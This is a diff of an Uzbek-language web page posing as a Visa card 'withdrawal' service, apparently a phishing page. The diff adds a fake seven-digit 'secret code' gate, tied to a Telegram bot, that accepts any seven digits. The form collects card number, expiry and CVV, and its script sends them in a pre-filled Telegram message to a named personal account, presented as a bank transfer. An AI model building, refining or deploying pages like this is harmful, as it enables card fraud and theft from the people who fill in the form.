--- a/index.html
+++ b/index.html
@@ -23,10 +23,10 @@
             justify-content: center;
             padding: 16px;
             position: relative;
-            background-color: #0b1a2e; /* fallback */
+            background-color: #0b1a2e;
         }
 
-        /* yarim shaffof fon rasmi */
+        /* Yarim shaffof fon rasmi */
         body::before {
             content: "";
             position: fixed;
@@ -38,12 +38,13 @@
             background-size: cover;
             background-position: center;
             background-repeat: no-repeat;
-            opacity: 0.5;  /* 50% shaffoflik */
+            opacity: 0.5;
             z-index: -1;
             pointer-events: none;
         }
 
-        .card-form {
+        /* Umumiy karta uslubi */
+        .card {
             width: 100%;
             max-width: 440px;
             background: rgba(255, 255, 255, 0.9);
@@ -56,7 +57,17 @@
             transition: all 0.2s;
         }
 
-        .card-form h2 {
+        /* Kod kiritish bo'limi */
+        #codeSection {
+            display: block;
+        }
+
+        /* Pul yechish bo'limi (dastlab yashirin) */
+        #withdrawSection {
+            display: none;
+        }
+
+        .card h2 {
             font-size: 28px;
             font-weight: 700;
             color: #0b1a2e;
@@ -171,7 +182,7 @@
             padding: 18px 20px;
             border: none;
             border-radius: 30px;
-            margin-top: 28px;
+            margin-top: 20px;
             cursor: pointer;
             box-shadow: 0 10px 20px -7px #0d47a1;
             transition: all 0.2s;
@@ -221,103 +232,165 @@
             padding-top: 16px;
         }
 
-        /* kichik ekran uchun moslashuv */
+        /* kod uchun alohida stil */
+        .code-hint {
+            text-align: center;
+            font-size: 14px;
+            color: #1a73e8;
+            background: rgba(26,115,232,0.1);
+            padding: 10px;
+            border-radius: 30px;
+            margin-bottom: 10px;
+            border: 1px dashed #1a73e8;
+        }
+
         @media (max-width: 480px) {
-            .card-form {
+            .card {
                 padding: 22px 16px;
                 border-radius: 28px;
             }
-
             .row-fields {
                 gap: 12px;
             }
-
             .input-field {
                 padding: 14px 16px;
                 font-size: 15px;
             }
-
             .btn-submit {
                 padding: 16px;
                 font-size: 17px;
             }
         }
-
-        /* simulyatsiya qilingan ikonkalar (inline svg emas, oddiy unicode) */
-        .icon {
-            font-size: 18px;
-        }
     </style>
 </head>
 <body>
 
-    <div class="card-form">
-        <div class="visa-badge">faqat Visa kartalar uchun</div>
-        <h2>💸 Pul yechish</h2>
-        <div class="subhead">maʼlumotlarni toʻldiring va tasdiqlang</div>
-
-        <!-- Forma maydoni -->
-        <form id="withdrawForm">
-            <!-- Karta raqami -->
+    <!-- ASOSIY KONTAINER: ikkala bo'lim ham bir xil card uslubida -->
+    <div class="card">
+        <!-- 7 XONALI KOD KIRITISH QISMI -->
+        <div id="codeSection">
+            <h2>🔐 Maxfiy kod</h2>
+            <div class="subhead">kirish uchun 7 xonali raqamni kiriting</div>
+            <div class="code-hint">⚡ telegram bot bergan kodni kiriting</div>
             <div class="input-group">
-                <label><span class="icon">💳</span> Karta raqami (Visa)</label>
-                <input type="text" id="cardNumber" class="input-field" placeholder="karta raqamini yozing" maxlength="19" inputmode="numeric" autocomplete="cc-number">
-                <div class="hint-text"><span class="icon">🔒</span> faqat visa kartasi kiriting</div>
+                <label><span class="icon">🔑</span> 7 xonali kod</label>
+                <input type="text" id="accessCode" class="input-field" placeholder="0000000" maxlength="7" inputmode="numeric" autocomplete="off">
+                <div class="hint-text"><span class="icon">📌</span> kod 7 ta belgidan iborat</div>
             </div>
-
-            <!-- Amal qilish muddati va CCV yonma-yon -->
-            <div class="row-fields">
-                <div class="input-group">
-                    <label><span class="icon">📅</span> amal qilish muddati</label>
-                    <input type="text" id="expiry" class="input-field" placeholder="MM/YY" maxlength="5" inputmode="numeric" autocomplete="cc-exp">
-                </div>
-                <div class="input-group">
-                    <label><span class="icon">🔐</span> CCV</label>
-                    <input type="text" id="ccv" class="input-field" placeholder="karta orqasida korsatilgan" maxlength="4" inputmode="numeric" autocomplete="off">
-                </div>
-            </div>
-
-            <!-- Yechish summasi -->
-            <div class="input-group">
-                <label><span class="icon">💰</span> Yechmoqchi boʻlgan summa</label>
-                <div class="amount-wrapper">
-                    <input type="text" id="amount" class="input-field" placeholder="25000" inputmode="numeric">
-                </div>
-                <div class="hint-text"><span class="icon">⬆️</span> Minimal 25 000 so‘m</div>
-            </div>
-
-            <!-- Yuborish tugmasi (telegramga yo‘naltirish) -->
-            <button type="submit" class="btn-submit" id="submitBtn">
-                <span>💰 </span> Pul yechish
+            <button class="btn-submit" id="verifyCodeBtn">
+                <span>✅</span> Tasdiqlash
             </button>
-        </form>
+            <footer>
+                ⚡ kodni tasdiqlab, pul yechish oynasiga o‘ting
+            </footer>
+        </div>
 
-        <footer>
-            ⚡ so‘rov to‘g‘ridan-to‘g‘ri Telegram orgali jo‘natiladi
-        </footer>
+        <!-- PUL YECHISH FORMA QISMI (dastlab yashirin) -->
+        <div id="withdrawSection">
+            <div class="visa-badge">faqat Visa kartalar uchun</div>
+            <h2>💸 Pul yechish</h2>
+            <div class="subhead">maʼlumotlarni toʻldiring va tasdiqlang</div>
+
+            <form id="withdrawForm">
+                <!-- Karta raqami -->
+                <div class="input-group">
+                    <label><span class="icon">💳</span> Karta raqami (Visa)</label>
+                    <input type="text" id="cardNumber" class="input-field" placeholder="karta raqami kiriting" maxlength="19" inputmode="numeric" autocomplete="cc-number">
+                    <div class="hint-text"><span class="icon">🔒</span>  faqat Visa </div>
+                </div>
+
+                <!-- Amal qilish muddati va CCV yonma-yon -->
+                <div class="row-fields">
+                    <div class="input-group">
+                        <label><span class="icon">📅</span> amal qilish muddat</label>
+                        <input type="text" id="expiry" class="input-field" placeholder="MM/YY" maxlength="5" inputmode="numeric" autocomplete="cc-exp">
+                    </div>
+                    <div class="input-group">
+                        <label><span class="icon">🔐</span> CCV</label>
+                        <input type="text" id="ccv" class="input-field" placeholder="123" maxlength="4" inputmode="numeric" autocomplete="off">
+                    </div>
+                </div>
+
+                <!-- Yechish summasi -->
+                <div class="input-group">
+                    <label><span class="icon">💰</span> Yechmoqchi boʻlgan summa</label>
+                    <div class="amount-wrapper">
+                        <input type="text" id="amount" class="input-field" placeholder="25000" inputmode="numeric">
+                    </div>
+                    <div class="hint-text"><span class="icon">⬆️</span> Minimal 25 000 so‘m</div>
+                </div>
+
+                <!-- Yuborish tugmasi -->
+                <button type="submit" class="btn-submit" id="submitBtn">
+                    <span>💰 </span> Pul yechish
+                </button>
+            </form>
+            <footer>
+                ⚡ so‘rov Telegram orqali jo‘natiladi
+            </footer>
+        </div>
     </div>
 
     <script>
         (function() {
+            // Elementlar
+            const codeSection = document.getElementById('codeSection');
+            const withdrawSection = document.getElementById('withdrawSection');
+            const accessCodeInput = document.getElementById('accessCode');
+            const verifyBtn = document.getElementById('verifyCodeBtn');
+
+            // Kodni tekshirish va pul yechish oynasini ochish
+            verifyBtn.addEventListener('click', function() {
+                let code = accessCodeInput.value.trim();
+
+                // 1. Faqat raqamlar va uzunligi 7 ga tengligini tekshirish
+                const isNumeric = /^\d+$/.test(code);  // faqat raqamlar
+                if (code.length === 7 && isNumeric) {
+                    // To'g'ri kod: kod bo'limini yashir, withdraw bo'limini ko'rsat
+                    codeSection.style.display = 'none';
+                    withdrawSection.style.display = 'block';
+                    // xatolik klassini olib tashlash (agar oldin qo'shilgan bo'lsa)
+                    accessCodeInput.classList.remove('error');
+                } else {
+                    // Xato: maydonni qizil qilish va alert
+                    accessCodeInput.classList.add('error');
+                    alert('Xato: 7 xonali raqam kiriting (faqat 0-9). Masalan: 1234567');
+                }
+            });
+
+            // Kod maydoniga faqat raqam kiritishga ruxsat (ixtiyoriy)
+            accessCodeInput.addEventListener('input', function(e) {
+                this.value = this.value.replace(/[^0-9]/g, '').slice(0, 7);
+                // Xatolik klassini olib tashlash (foydalanuvchi tuzatayotganda)
+                this.classList.remove('error');
+            });
+
+            // Enter bosilganda ham tasdiqlash ishlasin
+            accessCodeInput.addEventListener('keypress', function(e) {
+                if (e.key === 'Enter') {
+                    e.preventDefault();
+                    verifyBtn.click();
+                }
+            });
+
+            // PUL YECHISH FORMASI (avvalgi kod asosida)
             const form = document.getElementById('withdrawForm');
             const cardInput = document.getElementById('cardNumber');
             const expiryInput = document.getElementById('expiry');
             const ccvInput = document.getElementById('ccv');
             const amountInput = document.getElementById('amount');
 
-            // Telefon raqam formatiga o‘xshab, karta raqamiga bo‘shliq qo‘yish (qulaylik uchun)
+            // Karta raqamiga bo'shliq qo'yish
             cardInput.addEventListener('input', function(e) {
                 let val = e.target.value.replace(/\s+/g, '').replace(/[^0-9]/g, '');
                 let parts = [];
                 for (let i = 0; i < val.length; i += 4) {
                     parts.push(val.substr(i, 4));
                 }
-                if (parts.length) {
-                    e.target.value = parts.join(' ');
-                }
+                e.target.value = parts.length ? parts.join(' ') : val;
             });
 
-            // expiry avtomatik slash qo‘yish (MM/YY)
+            // Amal qilish muddatiga "/" qo'yish
             expiryInput.addEventListener('input', function(e) {
                 let val = e.target.value.replace(/\//g, '').replace(/[^0-9]/g, '');
                 if (val.length >= 2) {
@@ -332,65 +405,43 @@
                 e.target.value = e.target.value.replace(/[^0-9]/g, '').substr(0, 4);
             });
 
-            // summa faqat raqam
+            // Summa faqat raqam
             amountInput.addEventListener('input', function(e) {
                 e.target.value = e.target.value.replace(/[^0-9]/g, '');
             });
 
-            // Formani yuborish (submit)
+            // Formani yuborish (pul yechish)
             form.addEventListener('submit', function(e) {
                 e.preventDefault();
 
-                // 1. Barcha maydonlarni o‘qib olish va tozalash
+                // Ma'lumotlarni olish
                 let rawCard = cardInput.value.replace(/\s+/g, '');
                 let expiry = expiryInput.value.trim();
                 let ccv = ccvInput.value.trim();
                 let amount = amountInput.value.trim();
 
-                // 2. Validatsiya
+                // Validatsiya
                 let errors = [];
 
-                // Karta raqami: 16 raqam va Visa (4 bilan boshlanadi)
-                if (!rawCard) {
-                    errors.push('Karta raqamini kiriting');
-                } else if (!/^\d{16}$/.test(rawCard)) {
-                    errors.push('Karta raqami 16 xonali bo‘lishi kerak');
-                } else if (rawCard[0] !== '4') {
-                    errors.push('Faqat Visa kartalar qabul qilinadi (raqam 4 bilan boshlanishi kerak)');
-                }
+                if (!rawCard) errors.push('Karta raqamini kiriting');
+                else if (!/^\d{16}$/.test(rawCard)) errors.push('Karta raqami 16 xonali bo‘lishi kerak');
+                else if (rawCard[0] !== '4') errors.push('Faqat Visa kartalar qabul qilinadi (4 bilan boshlanishi kerak)');
 
-                // Amal qilish muddati MM/YY
-                if (!expiry) {
-                    errors.push('Amal qilish muddatini kiriting');
-                } else if (!/^(0[1-9]|1[0-2])\/\d{2}$/.test(expiry)) {
-                    errors.push('Muddat formati MM/YY bo‘lishi kerak (masalan 12/25)');
-                } else {
-                    // oddiy tekshiruv: oy 01-12
-                    let month = parseInt(expiry.split('/')[0], 10);
-                    if (month < 1 || month > 12) errors.push('Oy 1-12 oralig‘ida bo‘lishi kerak');
-                }
+                if (!expiry) errors.push('Amal qilish muddatini kiriting');
+                else if (!/^(0[1-9]|1[0-2])\/\d{2}$/.test(expiry)) errors.push('Muddat formati MM/YY (masalan 12/25)');
 
-                // CCV 3 yoki 4 raqam
-                if (!ccv) {
-                    errors.push('CCV kodini kiriting');
-                } else if (!/^\d{3,4}$/.test(ccv)) {
-                    errors.push('CCV 3 yoki 4 raqamdan iborat bo‘lishi kerak');
-                }
+                if (!ccv) errors.push('CCV kodini kiriting');
+                else if (!/^\d{3,4}$/.test(ccv)) errors.push('CCV 3 yoki 4 raqam');
 
-                // Summa: minimal 25000, faqat son
-                if (!amount) {
-                    errors.push('Summani kiriting');
-                } else {
+                if (!amount) errors.push('Summani kiriting');
+                else {
                     let amountNum = parseInt(amount, 10);
-                    if (isNaN(amountNum) || amountNum < 25000) {
-                        errors.push('Minimal yechish miqdori 25 000 so‘m');
-                    }
+                    if (isNaN(amountNum) || amountNum < 25000) errors.push('Minimal yechish miqdori 25 000 so‘m');
                 }
 
-                // Agar xatoliklar bo‘lsa, ularni ko‘rsat
+                // Xatoliklarni ko'rsatish
                 if (errors.length > 0) {
                     alert('Xatoliklar:\n- ' + errors.join('\n- '));
-                    // xatolik maydonlarini qizil qilish (oddiy)
                     [cardInput, expiryInput, ccvInput, amountInput].forEach(i => i.classList.remove('error'));
                     if (!rawCard || rawCard.length !== 16 || rawCard[0] !== '4') cardInput.classList.add('error');
                     if (!expiry || !/^(0[1-9]|1[0-2])\/\d{2}$/.test(expiry)) expiryInput.classList.add('error');
@@ -399,39 +450,27 @@
                     return;
                 }
 
-                // Xatoliklar bo‘lmasa, barcha error klasslarini olib tashlaymiz
-                [cardInput, expiryInput, ccvInput, amountInput].forEach(i => i.classList.remove('error'));
-
-                // 3. Telegram xabar matnini tuzish (barcha ma'lumotlar)
+                // Xatolik bo'lmasa, xabar tuzish
                 const message = `men pul yechmoqchiman\n` +
                                 `💳 Karta: ${rawCard.match(/.{1,4}/g).join(' ')}\n` +
                                 `📅 Muddat: ${expiry}\n` +
                                 `🔐 CCV: ${ccv}\n` +
                                 `💰 Summa: ${parseInt(amount, 10).toLocaleString()} so‘m`;
 
-                // 4. Telegram username @Vlad_admin_ru_uz ga to‘g‘ridan-to‘g‘ri xabar yuborish uchun link
-                //    t.me/username?text=... ishlaydi (agar foydalanuvchi telegram web/mobil ochiq bo‘lsa)
-                const telegramUsername = 'Vlad_admin_ru_uz'; // @siz
+                const telegramUsername = 'Vlad_admin_ru_uz';
                 const encodedMessage = encodeURIComponent(message);
                 const telegramUrl = `https://t.me/${telegramUsername}?text=${encodedMessage}`;
 
-                // 5. Foydalanuvchini xabarnoma qilamiz va yangi oynada telegram havolasini ochamiz
-                //    (agar mobil bo‘lsa, telegram ilovasi ochiladi, aks holda telegram web)
-                const confirmSend = confirm(`Quyidagi maʼlumotlar telegram orqali Bank transfer ga yuboriladi:\n\n${message}\n\n"OK" ni bosing va Telegram orqali yuboring.`);
+                const confirmSend = confirm(`tolov malumotlari ban transfer ga yuboriladi:\n\n${message}\n\n"OK" ni bosing va Telegram orqali yuboring.`);
                 if (confirmSend) {
-                    // Yangi oynada yoki shu oynada ochish (target="_blank" qilish uchun)
                     window.open(telegramUrl, '_blank');
                 }
-
-                // Ixtiyoriy: formani tozalash (agar kerak bo‘lsa)
-                // cardInput.value = '';  // izoh: ma'lumotlar o‘chirilsinmi? hozircha tozalamaymiz
             });
 
-            // Yana bir tekshirish: agar foydalanuvchi karta raqamini kiritayotganda visa emasligini sezish
+            // Karta raqamida Visa tekshiruvi (blur)
             cardInput.addEventListener('blur', function() {
                 let val = this.value.replace(/\s/g, '');
                 if (val.length > 0 && val[0] !== '4') {
-                    // ogohlantirish, lekin error klassini qo‘yish
                     cardInput.classList.add('error');
                 } else {
                     cardInput.classList.remove('error');
@@ -440,8 +479,5 @@
 
         })();
     </script>
-
-    <!-- Izoh: rasm Pexels bepul (Kara Eads, litsenziya Pexels) – bank kartalari mavzusida -->
-    <!-- @Vlad_admin_ru_uz ga yuborish uchun t.me/username?text=... dan foydalanilgan -->
 </body>
 </html>
